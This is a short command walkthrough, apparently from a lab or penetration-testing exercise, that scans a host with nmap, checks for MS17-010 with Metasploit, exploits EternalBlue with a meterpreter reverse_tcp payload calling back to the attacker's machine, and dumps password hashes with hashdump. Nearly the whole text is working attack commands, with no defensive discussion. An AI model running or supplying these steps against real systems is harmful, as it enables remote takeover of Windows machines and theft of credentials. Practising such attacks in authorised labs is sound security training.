Parse for open ports:

nmap --top-ports 50 10.10.10.50

Parse open SMB port (445):

nmap -p 445 --open --script=smb-os-discovery 10.10.10.50

Enter metasploit:

msfconsole

Test for vulnerability:

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS 10.10.10.50

run

Exploit EternalBlue:

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 10.10.10.50

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 10.10.10.75 # your Kali IP

exploit

Post exploitation:

sysinfo

ipconfig

hashdump